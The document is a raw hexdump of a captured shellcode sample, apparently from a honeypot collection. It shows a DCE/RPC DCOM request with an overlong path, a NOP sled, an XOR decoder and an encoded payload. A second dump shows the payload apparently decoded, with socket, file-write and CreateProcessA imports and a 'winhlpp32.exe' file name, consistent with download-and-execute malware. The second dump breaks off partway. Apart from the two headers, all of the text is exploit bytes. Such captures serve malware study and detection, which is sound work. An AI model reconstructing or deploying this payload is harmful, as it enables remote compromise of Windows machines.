file: csni:shellcodes:halle:halle.bin
Size: 2904 bytes
hexdump -C 3e653421b5f4d7c634f735e07f30e666.bin 00000000 05 00 00 03 10 00 00 00 58 0b 00 00 e5 00 00 00 |........X.......| 00000010 40 0b 00 00 01 00 04 00 05 00 06 00 01 00 00 00 |@...............| 00000020 00 00 00 00 32 24 58 fd cc 45 64 49 b0 70 dd ae |....2$X..EdI.p..| 00000030 74 2c 96 d2 60 5e 0d 00 01 00 00 00 00 00 00 00 |t,..`^..........| 00000040 70 5e 0d 00 02 00 00 00 7c 5e 0d 00 00 00 00 00 |p^......|^......| 00000050 10 00 00 00 80 96 f1 f1 2a 4d ce 11 a6 6a 00 20 |........*M...j. | 00000060 af 6e 72 f4 0c 00 00 00 4d 41 52 42 01 00 00 00 |.nr.....MARB....| 00000070 00 00 00 00 0d f0 ad ba 00 00 00 00 a8 f4 0b 00 |................| 00000080 d0 0a 00 00 d0 0a 00 00 4d 45 4f 57 04 00 00 00 |........MEOW....| 00000090 a2 01 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |...............F| 000000a0 38 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 |8..............F| 000000b0 00 00 00 00 a0 0a 00 00 98 0a 00 00 00 00 00 00 |................| 000000c0 01 10 08 00 cc cc cc cc c8 00 00 00 4d 45 4f 57 |............MEOW| 000000d0 98 0a 00 00 d8 00 00 00 00 00 00 00 02 00 00 00 |................| 000000e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 000000f0 00 00 00 00 c4 28 cd 00 64 29 cd 00 00 00 00 00 |.....(..d)......| 00000100 07 00 00 00 b9 01 00 00 00 00 00 00 c0 00 00 00 |................| 00000110 00 00 00 46 ab 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000120 00 00 00 46 a5 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000130 00 00 00 46 a6 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000140 00 00 00 46 a4 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000150 00 00 00 46 ad 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000160 00 00 00 46 aa 01 00 00 00 00 00 00 c0 00 00 00 |...F............| 00000170 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 |...F....`...X...| 00000180 90 00 00 00 40 00 00 00 20 00 00 00 e8 07 00 00 |....@... 
.......| 00000190 30 00 00 00 01 00 00 00 01 10 08 00 cc cc cc cc |0...............| 000001a0 50 00 00 00 4f b6 88 20 ff ff ff ff 00 00 00 00 |P...O.. ........| 000001b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| * 000001f0 00 00 00 00 00 00 00 00 01 10 08 00 cc cc cc cc |................| 00000200 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 |H.....f.........| 00000210 c0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 |.......F........| 00000220 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0c 00 |............x...| 00000230 58 00 00 00 05 00 06 00 01 00 00 00 70 d8 98 93 |X...........p...| 00000240 98 4f d2 11 a9 3d be 57 b2 00 00 00 32 00 31 00 |.O...=.W....2.1.| 00000250 01 10 08 00 cc cc cc cc 80 00 00 00 0d f0 ad ba |................| 00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000270 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 |.C......`...`...| 00000280 4d 45 4f 57 04 00 00 00 c0 01 00 00 00 00 00 00 |MEOW............| 00000290 c0 00 00 00 00 00 00 46 3b 03 00 00 00 00 00 00 |.......F;.......| 000002a0 c0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 |.......F....0...| 000002b0 01 00 01 00 81 c5 17 03 80 0e e9 4a 99 99 f1 8a |...........J....| 000002c0 50 6f 7a 85 02 00 00 00 00 00 00 00 00 00 00 00 |Poz.............| 000002d0 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 |................| 000002e0 01 10 08 00 cc cc cc cc 30 00 00 00 78 00 6e 00 |........0...x.n.| 000002f0 00 00 00 00 d8 da 0d 00 00 00 00 00 00 00 00 00 |................| 00000300 20 2f 0c 00 00 00 00 00 00 00 00 00 03 00 00 00 | /..............| 00000310 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 |........F.X.....| 00000320 01 10 08 00 cc cc cc cc 10 00 00 00 30 00 2e 00 |............0...| 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................| 00000340 01 10 08 00 cc cc cc cc 68 00 00 00 0e 00 ff ff |........h.......| 00000350 68 8b 0b 00 02 00 00 00 00 00 00 00 00 00 00 00 |h...............| 00000360 de 
03 00 00 00 00 00 00 de 03 00 00 5c 00 5c 00 |............\.\.| 00000370 46 00 58 00 4e 00 42 00 46 00 58 00 46 00 58 00 |F.X.N.B.F.X.F.X.| 00000380 4e 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 |N.B.F.X.F.X.F.X.| 00000390 46 00 58 00 c6 16 00 01 cc e0 fd 7f cc e0 fd 7f |F.X.............| 000003a0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 |................| * 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 eb 02 |................| 00000450 eb 05 e8 f9 ff ff ff 5b 31 c9 66 b9 86 06 80 73 |.......[1.f....s| 00000460 0e d4 43 e2 f9 3d 8b d5 d4 d4 8f 82 83 84 3c 67 |..C..=........<g| 00000470 d7 d4 d4 59 67 4b d4 d4 d4 59 6f 7c d4 d4 d4 13 |...YgK...Yo|....| 00000480 57 73 d5 d4 d4 db d4 d4 d4 3c d3 d7 d4 d4 5d 57 |Ws.......<....]W| 00000490 20 d4 d4 d4 59 6f 63 d4 d4 d4 13 57 73 d5 d4 d4 | ...Yoc....Ws...| 000004a0 d9 d4 d4 d4 3c 38 d6 d4 d4 5d 57 24 d4 d4 d4 59 |....<8...]W$...Y| 000004b0 6f 10 d4 d4 d4 3c 17 d6 d4 d4 5d 57 30 d4 d4 d4 |o....<....]W0...| 000004c0 59 6f 1e d4 d4 d4 3c 66 d6 d4 d4 5d 57 3c d4 d4 |Yo....<f...]W<..| 000004d0 d4 59 6f 01 d4 d4 d4 3c 75 d6 d4 d4 5d 57 38 d4 |.Yo....<u...]W8.| 000004e0 d4 d4 59 67 de d4 d4 d4 59 6f c5 d4 d4 d4 3c 5e |..Yg....Yo....<^| 000004f0 d6 d4 d4 5d 57 95 d4 d4 d4 59 6f c8 d4 d4 d4 3c |...]W....Yo....<| 00000500 ad d6 d4 d4 5d 57 91 d4 d4 d4 59 6f f7 d4 d4 d4 |....]W....Yo....| 00000510 3c bc d6 d4 d4 5d 57 9d d4 d4 d4 59 6f ff d4 d4 |<....]W....Yo...| 00000520 d4 3c 83 d6 d4 d4 5d 57 99 d4 d4 d4 59 6f e4 d4 |.<....]W....Yo..| 00000530 d4 d4 3c 92 d6 d4 d4 5d 57 85 d4 d4 d4 59 6f e1 |..<....]W....Yo.| 00000540 d4 d4 d4 3c e1 d6 d4 d4 5d 57 81 d4 d4 d4 59 67 |...<....]W....Yg| 00000550 8d d4 d4 d4 59 6f b4 d4 d4 d4 3c ca d6 d4 d4 5d |....Yo....<....]| 00000560 57 53 d4 d4 d4 59 6f b2 d4 d4 d4 3c d9 d6 d4 d4 |WS...Yo....<....| 00000570 5d 57 5f d4 d4 d4 59 6f b9 d4 d4 d4 3c 28 d5 d4 |]W_...Yo....<(..| 00000580 d4 5d 57 5b d4 d4 d4 59 6f a0 d4 d4 d4 3c 3f d5 |.]W[...Yo....<?.| 00000590 d4 d4 5d 57 47 d4 d4 d4 
59 6f af d4 d4 d4 3c 0e |..]WG...Yo....<.| 000005a0 d5 d4 d4 5d 57 43 d4 d4 d4 59 6f 56 d4 d4 d4 3c |...]WC...YoV...<| 000005b0 1d d5 d4 d4 5d 57 4f d4 d4 d4 87 3c 3f d6 d4 d4 |....]WO....<?...| 000005c0 8f 8c 8b 8a 3c c4 d1 d4 d4 3c 48 2a 2b 2b d4 d4 |....<....<H*++..| 000005d0 d4 d4 92 30 f0 a2 fa c9 a3 a7 e6 8b e7 e6 d4 83 |...0............| 000005e0 87 95 87 a0 b5 a6 a0 a1 a4 d4 a7 bb b7 bf b1 a0 |................| 000005f0 d4 b7 bb ba ba b1 b7 a0 d4 a6 b1 b7 a2 d4 a7 b1 |................| 00000600 ba b0 d4 b7 b8 bb a7 b1 a7 bb b7 bf b1 a0 d4 d4 |................| 00000610 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 00000620 d4 d4 d4 d4 d4 d4 d4 b9 a7 a2 b7 a6 a0 d4 b2 bb |................| 00000630 a4 b1 ba d4 b2 b7 b8 bb a7 b1 d4 b2 a3 a6 bd a0 |................| 00000640 b1 d4 b9 b1 b9 a7 b1 a0 d4 b9 b5 b8 b8 bb b7 d4 |................| 00000650 b2 a6 b1 b1 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 00000660 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 bf b1 a6 |................| 00000670 ba b1 b8 e7 e6 d4 93 b1 a0 84 a6 bb b7 95 b0 b0 |................| 00000680 a6 b1 a7 a7 d4 98 bb b5 b0 98 bd b6 a6 b5 a6 ad |................| 00000690 95 d4 87 b8 b1 b1 a4 d4 91 ac bd a0 80 bc a6 b1 |................| 000006a0 b5 b0 d4 97 a6 b1 b5 a0 b1 84 a6 bb b7 b1 a7 a7 |................| 000006b0 95 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| 000006c0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 000006e0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 90 d4 d4 d4 d4 d4 |................| 000006f0 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 00000730 d4 d4 a3 ff b6 d4 d4 d4 d4 d4 a3 bd ba bc b8 a4 |................| 00000740 a4 e7 e6 fa b1 ac b1 d4 bb a4 b1 ba d4 c2 d4 d4 |................| 00000750 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 |................| * 00000770 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 d4 85 83 82 |................| 00000780 82 2b 47 24 d4 d4 d4 84 8d 83 85 2b 47 20 
d4 d4 |.+G$.......+G ..| 00000790 d4 8a 8b 8d 17 e5 14 5d 57 77 d5 d4 d4 5f 47 77 |.......]Ww..._Gw| 000007a0 d5 d4 d4 ef 47 47 d5 d4 d4 a9 b7 96 5d 47 77 d5 |....GG......]Gw.| 000007b0 d4 d4 e5 14 5f 57 77 d5 d4 d4 15 34 d6 5f 5f 4f |...._Ww....4.__O| 000007c0 d5 d4 d4 d5 15 5f d5 d7 57 5b d5 d4 d4 83 82 85 |....._..W[......| 000007d0 5d 2a 5d 13 5f 5f 73 d5 d4 d4 27 72 8d 8a 8b a1 |]*].__s...'r....| 000007e0 68 e5 14 5f 57 77 d5 d4 d4 05 34 5f 5f 4b d5 d4 |h.._Ww....4__K..| 000007f0 d4 d5 15 e5 14 b2 5f d5 15 34 d6 5f 5f 43 d5 d4 |......_..4.__C..| 00000800 d4 d5 1c 5f dc d7 5f 5b d5 d4 d4 5d 1c 17 e5 14 |..._.._[...]....| 00000810 17 3d 1c d6 d4 d4 ea 5f 94 e0 ea 5f 7c 6c d4 d4 |.=....._..._|l..| 00000820 d4 3d da d4 d4 d4 84 85 82 81 b0 75 e4 d4 d4 d4 |.=.........u....| 00000830 51 14 ac 36 ea 5f 94 d8 ea 5f a4 c8 79 ea 5f bc |Q..6._..._..y._.| 00000840 dc 5d 7f 5b d5 d4 d4 5d 3c b2 55 ec 99 8e a1 15 |.].[...]<.U.....| 00000850 d1 e8 d4 d4 d4 5f dc d7 5f 5b d5 d4 d4 b2 55 ed |....._.._[....U.| 00000860 84 91 a1 79 55 15 ac d4 d4 d4 5f e5 d7 67 5b d5 |...yU....._..g[.| 00000870 d4 d4 55 12 cc d4 d4 d4 79 5d 57 47 d5 d4 d4 79 |..U.....y]WG...y| 00000880 d7 57 5b d5 d4 d4 5d 57 43 d5 d4 d4 79 d7 57 5b |.W[...]WC...y.W[| 00000890 d5 d4 d4 5d 57 4f d5 d4 d4 79 d7 57 5b d5 d4 d4 |...]WO...y.W[...| 000008a0 5d 57 4b d5 d4 d4 89 8a 8d 8c 17 84 6c d4 d0 d4 |]WK.........l...| 000008b0 d4 3c a5 d5 d4 d4 e9 d4 d4 d4 d4 db 50 3e 2b 2b |.<..........P>++| 000008c0 2b 5d 57 57 d5 d4 d4 8c 5f 47 57 d5 d4 d4 86 bc |+]WW...._GW.....| 000008d0 d5 d5 d4 d4 ea 2b 87 95 e9 d4 d4 d4 d4 db 51 31 |.....+........Q1| 000008e0 2b 2b 2b bc d2 d4 d4 d4 bc d5 d4 d4 d4 bc d6 d4 |+++.............| 000008f0 d4 d4 ea 2b 87 91 e9 2b 2b 2b 2b db 50 36 2b 2b |...+...++++.P6++| 00000900 2b 5d 57 2c d4 d4 d4 83 84 87 59 47 ab d5 d4 d4 |+]W,......YG....| 00000910 12 d6 c2 86 59 47 28 d4 d4 d4 b2 13 d6 d6 d4 b2 |....YG(.........| 00000920 5f af dc b2 5d ae d6 5f af d0 5d ae d0 86 5f 57 
|_...].._..]..._W| 00000930 2c d4 d4 d4 84 ea 2b 87 9d e9 d4 d4 d4 d4 db 58 |,.....+........X| 00000940 12 2b 2b 2b 8f 8c 8b 84 6c d4 c4 d4 d4 3c 01 d4 |.+++....l....<..| 00000950 d4 d4 e9 d4 d4 d4 d4 db 50 3e 2b 2b 2b 5d 57 b4 |........P>+++]W.| 00000960 d5 d4 d4 8c 3c ed d4 d4 d4 3c 0c d4 d4 d4 3c 83 |....<....<....<.| 00000970 d4 d4 d4 3c cb d5 d4 d4 17 5f 57 2c d4 d4 d4 84 |...<....._W,....| 00000980 ea 2b 87 81 5f 57 7f d5 d4 d4 94 5d 57 7f d5 d4 |.+.._W.....]W...| 00000990 d4 e9 d1 d4 d4 d4 db 50 d1 d4 d4 d4 3d 96 2b 2b |.......P....=.++| 000009a0 2b 17 bc d4 d4 d4 d4 bc d0 d4 d4 d4 59 47 53 d5 |+...........YGS.| 000009b0 d4 d4 86 5f 47 2c d4 d4 d4 86 ea 2b 87 99 e9 d5 |..._G,.....+....| 000009c0 d4 d4 d4 db 58 64 2b 2b 2b 17 83 82 5f 6f 53 d5 |....Xd+++..._oS.| 000009d0 d4 d4 5f 67 5f d5 d4 d4 ed 23 8a 8b db 50 e6 d4 |.._g_....#...P..| 000009e0 d4 d4 bc d4 d4 d4 d4 bc d4 c4 d4 d4 5f 47 b4 d5 |............_G..| 000009f0 d4 d4 86 5f 47 2c d4 d4 d4 86 ea 2b 87 99 e9 d5 |..._G,.....+....| 00000a00 d4 d4 d4 db 58 a4 2b 2b 2b d5 57 5f d5 d4 d4 3d |....X.+++.W_...=| 00000a10 84 d4 d4 d4 3c ba d4 d4 d4 84 5f 57 2c d4 d4 d4 |....<....._W,...| 00000a20 84 ea 2b 87 81 8c 17 5d 13 84 ea 2b 47 43 d4 d4 |..+....]...+GC..| 00000a30 d4 8b 84 83 bc d4 d4 d4 d4 84 ea 2b 47 47 d4 d4 |...........+GG..| 00000a40 d4 8b 8b 8b 8c 17 59 47 b0 d5 d4 d4 86 59 47 b8 |......YG.....YG.| 00000a50 d5 d4 d4 86 ea 2b 47 53 d4 d4 d4 8b 8b 5d 57 bc |.....+GS.....]W.| 00000a60 d5 d4 d4 17 2b 67 bc d5 d4 d4 84 bc d5 d4 d4 d4 |....+g..........| 00000a70 5f 47 b4 d5 d4 d4 86 ea 2b 47 5b d4 d4 d4 8b 8b |_G......+G[.....| 00000a80 8b 8b 3d 97 2b 2b 2b 5f 47 bc d5 d4 d4 86 ea 2b |..=.+++_G......+| 00000a90 47 5f d4 d4 d4 8b 17 84 59 57 d8 d5 d4 d4 84 59 |G_......YW.....Y| 00000aa0 57 c8 d5 d4 d4 84 bc d4 d4 d4 d4 bc d4 d4 d4 d4 |W...............| 00000ab0 bc fc d4 d4 d4 bc d4 d4 d4 d4 bc d4 d4 d4 d4 bc |................| 00000ac0 d4 d4 d4 d4 59 57 b8 d5 d4 d4 84 bc d4 d4 d4 d4 |....YW..........| 
00000ad0 ea 2b 47 38 d4 d4 d4 8c 17 3c 7d 2b 2b 2b bc d4 |.+G8.....<}+++..| 00000ae0 d4 d4 d4 2b 47 3c d4 d4 d4 44 d4 00 5c 00 43 00 |...+G<...D..\.C.| 00000af0 24 00 5c 00 31 00 32 00 33 00 34 00 35 00 36 00 |$.\.1.2.3.4.5.6.| 00000b00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 |1.1.1.1.1.1.1.1.| 00000b10 31 00 31 00 31 00 31 00 31 00 31 00 31 00 2e 00 |1.1.1.1.1.1.1...| 00000b20 64 00 6f 00 63 00 00 00 01 10 08 00 cc cc cc cc |d.o.c...........| 00000b30 20 00 00 00 30 00 2d 00 00 00 00 00 88 2a 0c 00 | ...0.-......*..| 00000b40 02 00 00 00 01 00 00 00 28 8c 0c 00 01 00 00 00 |........(.......| 00000b50 07 00 00 00 00 00 00 00 |........| 00000b58
00000000: 05 00 00 03 10 00 00 00 - 58 0b 00 00 e5 00 00 00 ........ X....... 00000010: 40 0b 00 00 01 00 04 00 - 05 00 06 00 01 00 00 00 ........ ........ 00000020: 00 00 00 00 32 24 58 fd - cc 45 64 49 b0 70 dd ae ....2.X. .EdI.p.. 00000030: 74 2c 96 d2 60 5e 0d 00 - 01 00 00 00 00 00 00 00 t....... ........ 00000040: 70 5e 0d 00 02 00 00 00 - 7c 5e 0d 00 00 00 00 00 p....... ........ 00000050: 10 00 00 00 80 96 f1 f1 - 2a 4d ce 11 a6 6a 00 20 ........ .M...j.. 00000060: af 6e 72 f4 0c 00 00 00 - 4d 41 52 42 01 00 00 00 .nr..... MARB.... 00000070: 00 00 00 00 0d f0 ad ba - 00 00 00 00 a8 f4 0b 00 ........ ........ 00000080: d0 0a 00 00 d0 0a 00 00 - 4d 45 4f 57 04 00 00 00 ........ MEOW.... 00000090: a2 01 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 ........ .......F 000000a0: 38 03 00 00 00 00 00 00 - c0 00 00 00 00 00 00 46 8....... .......F 000000b0: 00 00 00 00 a0 0a 00 00 - 98 0a 00 00 00 00 00 00 ........ ........ 000000c0: 01 10 08 00 cc cc cc cc - c8 00 00 00 4d 45 4f 57 ........ ....MEOW 000000d0: 98 0a 00 00 d8 00 00 00 - 00 00 00 00 02 00 00 00 ........ ........ 000000e0: 07 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000000f0: 00 00 00 00 c4 28 cd 00 - 64 29 cd 00 00 00 00 00 ........ d....... 00000100: 07 00 00 00 b9 01 00 00 - 00 00 00 00 c0 00 00 00 ........ ........ 00000110: 00 00 00 46 ab 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000120: 00 00 00 46 a5 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000130: 00 00 00 46 a6 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000140: 00 00 00 46 a4 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000150: 00 00 00 46 ad 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000160: 00 00 00 46 aa 01 00 00 - 00 00 00 00 c0 00 00 00 ...F.... ........ 00000170: 00 00 00 46 07 00 00 00 - 60 00 00 00 58 00 00 00 ...F.... ....X... 00000180: 90 00 00 00 40 00 00 00 - 20 00 00 00 e8 07 00 00 ........ ........ 
00000190: 30 00 00 00 01 00 00 00 - 01 10 08 00 cc cc cc cc 0....... ........ 000001a0: 50 00 00 00 4f b6 88 20 - ff ff ff ff 00 00 00 00 P...O... ........ 000001b0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001e0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000001f0: 00 00 00 00 00 00 00 00 - 01 10 08 00 cc cc cc cc ........ ........ 00000200: 48 00 00 00 07 00 66 00 - 06 09 02 00 00 00 00 00 H.....f. ........ 00000210: c0 00 00 00 00 00 00 46 - 10 00 00 00 00 00 00 00 .......F ........ 00000220: 00 00 00 00 01 00 00 00 - 00 00 00 00 78 19 0c 00 ........ ....x... 00000230: 58 00 00 00 05 00 06 00 - 01 00 00 00 70 d8 98 93 X....... ....p... 00000240: 98 4f d2 11 a9 3d be 57 - b2 00 00 00 32 00 31 00 .O.....W ....2.1. 00000250: 01 10 08 00 cc cc cc cc - 80 00 00 00 0d f0 ad ba ........ ........ 00000260: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000270: 18 43 14 00 00 00 00 00 - 60 00 00 00 60 00 00 00 .C...... ........ 00000280: 4d 45 4f 57 04 00 00 00 - c0 01 00 00 00 00 00 00 MEOW.... ........ 00000290: c0 00 00 00 00 00 00 46 - 3b 03 00 00 00 00 00 00 .......F ........ 000002a0: c0 00 00 00 00 00 00 46 - 00 00 00 00 30 00 00 00 .......F ....0... 000002b0: 01 00 01 00 81 c5 17 03 - 80 0e e9 4a 99 99 f1 8a ........ ...J.... 000002c0: 50 6f 7a 85 02 00 00 00 - 00 00 00 00 00 00 00 00 Poz..... ........ 000002d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 01 00 00 00 ........ ........ 000002e0: 01 10 08 00 cc cc cc cc - 30 00 00 00 78 00 6e 00 ........ 0...x.n. 000002f0: 00 00 00 00 d8 da 0d 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000300: 20 2f 0c 00 00 00 00 00 - 00 00 00 00 03 00 00 00 ........ ........ 00000310: 00 00 00 00 03 00 00 00 - 46 00 58 00 00 00 00 00 ........ F.X..... 
00000320: 01 10 08 00 cc cc cc cc - 10 00 00 00 30 00 2e 00 ........ ....0... 00000330: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000340: 01 10 08 00 cc cc cc cc - 68 00 00 00 0e 00 ff ff ........ h....... 00000350: 68 8b 0b 00 02 00 00 00 - 00 00 00 00 00 00 00 00 h....... ........ 00000360: de 03 00 00 00 00 00 00 - de 03 00 00 5c 00 5c 00 ........ ........ 00000370: 46 00 58 00 4e 00 42 00 - 46 00 58 00 46 00 58 00 F.X.N.B. F.X.F.X. 00000380: 4e 00 42 00 46 00 58 00 - 46 00 58 00 46 00 58 00 N.B.F.X. F.X.F.X. 00000390: 46 00 58 00 c6 16 00 01 - cc e0 fd 7f cc e0 fd 7f F.X..... ........ 000003a0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003b0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003c0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003d0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003e0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 000003f0: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000400: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000410: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000420: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000430: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 90 90 ........ ........ 00000440: 90 90 90 90 90 90 90 90 - 90 90 90 90 90 90 eb 02 ........ ........ 00000450: eb 05 e8 f9 ff ff ff 5b - 31 c9 66 b9 86 06 80 73 ........ 1.f....s 00000460: 0e d4 43 e2 f9 e9 5f 01 - 00 00 5b 56 57 50 e8 b3 ..C..... ...VWP.. 00000470: 03 00 00 8d b3 9f 00 00 - 00 8d bb a8 00 00 00 c7 ........ ........ 00000480: 83 a7 01 00 00 0f 00 00 - 00 e8 07 03 00 00 89 83 ........ ........ 00000490: f4 00 00 00 8d bb b7 00 - 00 00 c7 83 a7 01 00 00 ........ ........ 000004a0: 0d 00 00 00 e8 ec 02 00 - 00 89 83 f0 00 00 00 8d ........ ........ 
000004b0: bb c4 00 00 00 e8 c3 02 - 00 00 89 83 e4 00 00 00 ........ ........ 000004c0: 8d bb ca 00 00 00 e8 b2 - 02 00 00 89 83 e8 00 00 ........ ........ 000004d0: 00 8d bb d5 00 00 00 e8 - a1 02 00 00 89 83 ec 00 ........ ........ 000004e0: 00 00 8d b3 0a 00 00 00 - 8d bb 11 00 00 00 e8 8a ........ ........ 000004f0: 02 00 00 89 83 41 00 00 - 00 8d bb 1c 00 00 00 e8 .....A.. ........ 00000500: 79 02 00 00 89 83 45 00 - 00 00 8d bb 23 00 00 00 y.....E. ........ 00000510: e8 68 02 00 00 89 83 49 - 00 00 00 8d bb 2b 00 00 .h.....I ........ 00000520: 00 e8 57 02 00 00 89 83 - 4d 00 00 00 8d bb 30 00 ..W..... M.....0. 00000530: 00 00 e8 46 02 00 00 89 - 83 51 00 00 00 8d bb 35 ...F.... .Q.....5 00000540: 00 00 00 e8 35 02 00 00 - 89 83 55 00 00 00 8d b3 ....5... ..U..... 00000550: 59 00 00 00 8d bb 60 00 - 00 00 e8 1e 02 00 00 89 Y....... ........ 00000560: 83 87 00 00 00 8d bb 66 - 00 00 00 e8 0d 02 00 00 .......f ........ 00000570: 89 83 8b 00 00 00 8d bb - 6d 00 00 00 e8 fc 01 00 ........ m....... 00000580: 00 89 83 8f 00 00 00 8d - bb 74 00 00 00 e8 eb 01 ........ .t...... 00000590: 00 00 89 83 93 00 00 00 - 8d bb 7b 00 00 00 e8 da ........ ........ 000005a0: 01 00 00 89 83 97 00 00 - 00 8d bb 82 00 00 00 e8 ........ ........ 000005b0: c9 01 00 00 89 83 9b 00 - 00 00 53 e8 eb 02 00 00 ........ ..S..... 000005c0: 5b 58 5f 5e e8 10 05 00 - 00 e8 9c fe ff ff 00 00 .X...... ........ 000005d0: 00 00 46 e4 24 76 2e 1d - 77 73 32 5f 33 32 00 57 ..F..v.. ws2.32.W 000005e0: 53 41 53 74 61 72 74 75 - 70 00 73 6f 63 6b 65 74 SAStartu p.socket 000005f0: 00 63 6f 6e 6e 65 63 74 - 00 72 65 63 76 00 73 65 .connect .recv.se 00000600: 6e 64 00 63 6c 6f 73 65 - 73 6f 63 6b 65 74 00 00 nd.close socket.. 00000610: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 
00000620: 00 00 00 00 00 00 00 6d - 73 76 63 72 74 00 66 6f .......m svcrt.fo 00000630: 70 65 6e 00 66 63 6c 6f - 73 65 00 66 77 72 69 74 pen.fclo se.fwrit 00000640: 65 00 6d 65 6d 73 65 74 - 00 6d 61 6c 6c 6f 63 00 e.memset .malloc. 00000650: 66 72 65 65 00 00 00 00 - 00 00 00 00 00 00 00 00 free.... ........ 00000660: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 6b 65 72 ........ .....ker 00000670: 6e 65 6c 33 32 00 47 65 - 74 50 72 6f 63 41 64 64 nel32.Ge tProcAdd 00000680: 72 65 73 73 00 4c 6f 61 - 64 4c 69 62 72 61 72 79 ress.Loa dLibrary 00000690: 41 00 53 6c 65 65 70 00 - 45 78 69 74 54 68 72 65 A.Sleep. ExitThre 000006a0: 61 64 00 43 72 65 61 74 - 65 50 72 6f 63 65 73 73 ad.Creat eProcess 000006b0: 41 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 A....... ........ 000006c0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000006d0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 000006e0: 00 00 00 00 00 00 00 00 - 00 00 44 00 00 00 00 00 ........ ..D..... 000006f0: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000700: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000710: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000720: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000730: 00 00 77 2b 62 00 00 00 - 00 00 77 69 6e 68 6c 70 ..w.b... ..winhlp 00000740: 70 33 32 2e 65 78 65 00 - 6f 70 65 6e 00 16 00 00 p32.exe. open.... 00000750: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000760: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ........ ........ 00000770: 00 00 00 00 00 00 00 00 - 00 00 00 00 00 51 57 56 ........ .....QWV 00000780: 56 ff 93 f0 00 00 00 50 - 59 57 51 ff 93 f4 00 00 V......P YWQ..... 00000790: 00 5e 5f 59 c3 31 c0 89 - 83 a3 01 00 00 8b 93 a3 ...Y.1.. ........ 000007a0: 01 00 00 3b 93 93 01 00 - 00 7d 63 42 89 93 a3 01 ........ ..cB.... 
